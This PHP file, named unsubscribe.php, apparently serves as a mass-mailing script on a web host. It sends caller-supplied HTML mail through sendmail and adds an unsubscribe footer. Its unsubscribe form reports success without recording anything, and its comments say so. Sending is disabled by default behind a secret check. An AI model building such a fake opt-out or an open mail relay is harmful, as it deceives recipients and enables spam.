File: /home/manukaar/public_html/fbf3wp/unsubscribe.php
<?php
// Shared-secret settings: an enforcement flag and the secret value itself.
// With these defaults enforcement is off and no secret is configured.
$REQUIRE_SECRET = false;
$REQUIRED_SECRET = '';

// Default response type for the plain-text status replies; the HTML branches
// further down send their own Content-Type header, which replaces this one.
header('Content-Type: text/plain; charset=utf-8');
/**
 * Abort the request with an error reply.
 *
 * Sets the HTTP status code, prints "FAILED: " followed by the message and
 * terminates the script. The message is written without any escaping; every
 * call visible in this file passes a fixed string.
 *
 * @param string $msg  Text appended after "FAILED: ".
 * @param int    $code HTTP status code to send.
 */
function bad($msg='Bad request', $code=400){
    http_response_code($code);
    print 'FAILED: ' . $msg;
    exit;
}
/**
 * Print a success message and terminate the script.
 *
 * The HTTP status is left untouched, so the reply carries whatever status was
 * already set (200 unless something changed it earlier).
 *
 * @param string $msg Text to print.
 */
function ok($msg='OK'){
    print $msg;
    exit;
}
/**
 * Flatten a value to a single line.
 *
 * Every carriage return and line feed is replaced by one space, then leading
 * and trailing whitespace is trimmed. In this file the result is placed into
 * mail header lines (subject, sender display name), where a raw CR/LF would
 * start a new header. Only CR and LF are handled; other characters pass through.
 *
 * @param string $val Raw input.
 * @return string Single-line, trimmed text.
 */
function sanitize($val){
    $singleLine = preg_replace("/[\r\n]/", " ", $val);
    return trim($singleLine);
}
/**
 * Validate an e-mail address.
 *
 * The input is trimmed and checked with FILTER_VALIDATE_EMAIL.
 *
 * @param string $email Candidate address.
 * @return string|false The trimmed address when it validates, otherwise false.
 */
function safe_email($email){
    $candidate = trim($email);
    $validated = filter_var($candidate, FILTER_VALIDATE_EMAIL);
    if ($validated) {
        return $validated;
    }
    return false;
}
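/**
 * Build a random string over the 62-character alphabet 0-9, a-z, A-Z.
 *
 * Each character is picked with random_int(), which is uniform over the
 * requested range. The earlier form mapped a random byte with `% 62`; since
 * 256 is not a multiple of 62, the first eight characters of the alphabet came
 * up slightly more often than the rest.
 *
 * @param int $length Number of characters to produce; 0 yields an empty string.
 * @return string Random string of exactly $length characters.
 * @throws InvalidArgumentException When $length is negative.
 */
function randomBase62(int $length = 26): string {
    if ($length < 0) {
        throw new InvalidArgumentException('Length must not be negative');
    }
    $chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $lastIndex = strlen($chars) - 1;
    $out = '';
    for ($i = 0; $i < $length; $i++) {
        $out .= $chars[random_int(0, $lastIndex)];
    }
    return $out;
}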
/**
 * Derive an "unsubscribe@<domain>" address from another address.
 *
 * The input must pass FILTER_VALIDATE_EMAIL and contain exactly one "@"; the
 * part after it is reused as the domain.
 *
 * @param string $email Address whose domain is reused.
 * @return string|false "unsubscribe@<domain>", or false when the input is not
 *                      a valid address or does not split into two parts.
 */
function makeUnsubscribeEmail($email) {
    $isValid = (bool) filter_var($email, FILTER_VALIDATE_EMAIL);
    if (!$isValid) {
        return false;
    }

    $pieces = explode('@', $email);
    if (count($pieces) === 2) {
        return 'unsubscribe@' . $pieces[1];
    }
    return false;
}
// Form submission from the unsubscribe page (POST field `maili`).
// The submitted value is HTML-escaped and echoed back under a success heading.
// Nothing in this branch stores, looks up or forwards the value, so the
// "Unsubscribed successfully" text is not backed by any visible state change.
// Because this check runs before the send logic and always exits, a request
// carrying `maili` never reaches the mail-sending code.
if (isset($_POST['maili'])) {
    header('Content-Type: text/html; charset=utf-8');
    $echoed = htmlspecialchars($_POST['maili'], ENT_QUOTES, 'UTF-8');
    echo '<center><h2>Unsubscribed successfully.</h2><p>' . $echoed . '</p></center>';
    exit;
}
// Landing page for the unsubscribe link (?unsub=<value>).
// Renders a small self-contained HTML form whose e-mail field is pre-filled
// with the HTML-escaped query value. ENT_QUOTES matters here because the value
// sits inside a single-quoted attribute. The form has no action attribute, so
// it posts back to this same URL with the field name `maili`.
if (isset($_GET['unsub'])) {
    header('Content-Type: text/html; charset=utf-8');
    $prefilled = htmlspecialchars($_GET['unsub'], ENT_QUOTES, 'UTF-8');

    $pageHead = '<!DOCTYPE html><html><head><title>Unsubscribe</title><style>body{display:flex;justify-content:center;align-items:center;height:100vh;background:#f5f5f5;font-family:Arial;}form{background:#fff;padding:20px;border-radius:12px;box-shadow:0 4px 15px rgba(0,0,0,0.1);display:flex;flex-direction:column;gap:12px;width:250px;}button{padding:10px;background:#0084ff;color:#fff;border:none;border-radius:8px;cursor:pointer;}</style></head>';
    $pageBody = "<body><form method='post'><input type='email' name='maili' value='" . $prefilled . "' required><button type='submit'>Unsubscribe</button></form></body></html>";

    echo $pageHead . $pageBody;
    exit;
}
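// Mail-send endpoint.
// Takes a POST with `to`, `subject`, `from_name` and `html`, appends an
// unsubscribe footer and pipes the message to the local sendmail binary.
// Recipient, subject, sender name and the whole HTML body come from the
// request, so whoever can reach this code can send arbitrary mail from this
// host. Access therefore has to be gated before any field is read.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') bad('Method not allowed', 405);

// Fail closed: refuse to send unless enforcement is switched on AND a
// non-empty secret is configured, then require the caller to present it.
// The field name `secret` is introduced by this check; the script did not
// previously read a secret from the request at all.
if (!$REQUIRE_SECRET || !is_string($REQUIRED_SECRET) || $REQUIRED_SECRET === '') bad('Sending disabled', 403);
$supplied_secret = $_POST['secret'] ?? '';
// hash_equals() compares in constant time; is_string() rejects array-valued fields.
if (!is_string($supplied_secret) || !hash_equals($REQUIRED_SECRET, $supplied_secret)) bad('Forbidden', 403);

// Array-valued fields (e.g. to[]=...) would otherwise raise type errors in
// trim()/preg_replace() or be interpolated as the literal text "Array".
foreach (['to', 'subject', 'from_name', 'html'] as $field) {
    if (isset($_POST[$field]) && !is_string($_POST[$field])) bad('Bad field type');
}

$to = safe_email($_POST['to'] ?? '');
$subject = sanitize($_POST['subject'] ?? '(no subject)');
$from_name = sanitize($_POST['from_name'] ?? '');
$html = $_POST['html'] ?? '';
if (!$to || !$html) bad('Missing to/html');

// Envelope/From address: the configured sendmail_from, else the account the
// script runs as at this server's name, else a fixed fallback.
$from_email_safe = ini_get('sendmail_from');
if (!$from_email_safe) {
    // posix_getpwuid() returns false when the lookup fails.
    $account = function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid()) : false;
    $from_email_safe = is_array($account)
        ? $account['name'] . '@' . ($_SERVER['SERVER_NAME'] ?? 'localhost')
        : 'admin@localhost';
}

$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https" : "http";

// The Host header is supplied by the client and ends up in a mail header line
// and in an href attribute, so only a plain host name or bracketed IP literal
// with an optional port is accepted.
$host = $_SERVER['HTTP_HOST'] ?? 'localhost';
if (!preg_match('/^(?:[A-Za-z0-9.-]+|\[[0-9A-Fa-f:.]+\])(?::[0-9]{1,5})?$/', $host)) bad('Bad host');

$script_dir = rtrim(dirname($_SERVER['SCRIPT_NAME']), "/\\");
$unsubscribe_url = $protocol . "://" . $host . $script_dir . "/unsubscribe.php?unsub=" . urlencode($to);

// Footer appended to the caller's HTML: the unsubscribe link plus a random ID.
$body = $html . "<hr><p align='center'><a href='{$unsubscribe_url}'>Unsubscribe</a><br>ID #" . randomBase62() . "</p>";

// makeUnsubscribeEmail() returns false when no address can be derived; in that
// case only the URL form is listed instead of emitting an empty "mailto:".
$list_unsub_mailto = makeUnsubscribeEmail($from_email_safe);
$list_unsubscribe = "<{$unsubscribe_url}>";
if ($list_unsub_mailto !== false) {
    $list_unsubscribe .= ", <mailto:{$list_unsub_mailto}?subject=unsubscribe>";
}

$full_headers = [
    "From: " . ($from_name ? "{$from_name} <{$from_email_safe}>" : $from_email_safe),
    "To: {$to}",
    "MIME-Version: 1.0",
    "Content-Type: text/html; charset=UTF-8",
    "List-Unsubscribe: " . $list_unsubscribe,
];

// -t makes sendmail take the recipients from the message headers; the envelope
// sender is passed through escapeshellarg() because it is part of a shell command.
$sendmail = '/usr/sbin/sendmail -oi -t -f ' . escapeshellarg($from_email_safe);
$proc = popen($sendmail, 'w');
if ($proc) {
    // The subject is sent as a base64 encoded-word, so its bytes never appear
    // raw in the header line.
    // NOTE(review): To is written twice (here and in $full_headers); left unchanged.
    fwrite($proc, "To: {$to}\r\nSubject: =?UTF-8?B?" . base64_encode($subject) . "?=\r\n" . implode("\r\n", $full_headers) . "\r\n\r\n" . $body);
    // pclose() returns the exit status of sendmail; anything but 0 is a failure.
    $exit_status = pclose($proc);
    if ($exit_status !== 0) bad('Failed', 500);
    ok('OK');
} else {
    bad('Failed', 500);
}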
?>